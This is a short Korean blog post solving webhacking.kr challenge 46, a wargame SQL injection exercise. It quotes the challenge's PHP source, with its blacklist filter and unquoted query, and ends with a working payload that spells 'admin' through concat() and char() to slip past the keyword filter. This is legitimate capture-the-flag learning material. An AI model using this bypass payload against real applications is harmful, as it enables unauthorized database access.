티스토리 뷰
webhacking.kr 46번 문제 : sql 인젝션
49번과 화면은 똑같다.
소스를 보아하니
<?
$_GET[lv]=str_replace(" ","",$_GET[lv]);
$_GET[lv]=str_replace("/","",$_GET[lv]);
$_GET[lv]=str_replace("*","",$_GET[lv]);
$_GET[lv]=str_replace("%","",$_GET[lv]);
if(eregi("union",$_GET[lv])) exit();
if(eregi("select",$_GET[lv])) exit();
if(eregi("from",$_GET[lv])) exit();
if(eregi("challenge",$_GET[lv])) exit();
if(eregi("0x",$_GET[lv])) exit();
if(eregi("limit",$_GET[lv])) exit();
if(eregi("cash",$_GET[lv])) exit();
$q=@mysql_fetch_array(mysql_query("select id,cash from zmail_member where lv=$_GET[lv]"));
if($q && $_GET[lv])
{
echo("$q[0] information<br><br>money : $q[1]");
if($q[0]=="admin") @solve();
}
49번은 0x 를 이용하요 HEX값을 이용하였지만 여기는 안된다~~
49번과 거의 똑같은 문제라고 보면된다!
힌트는 concat함수! , char() 아스키코드
lv=4||id=concat(char(97),char(100),char(109),char(105),char(110))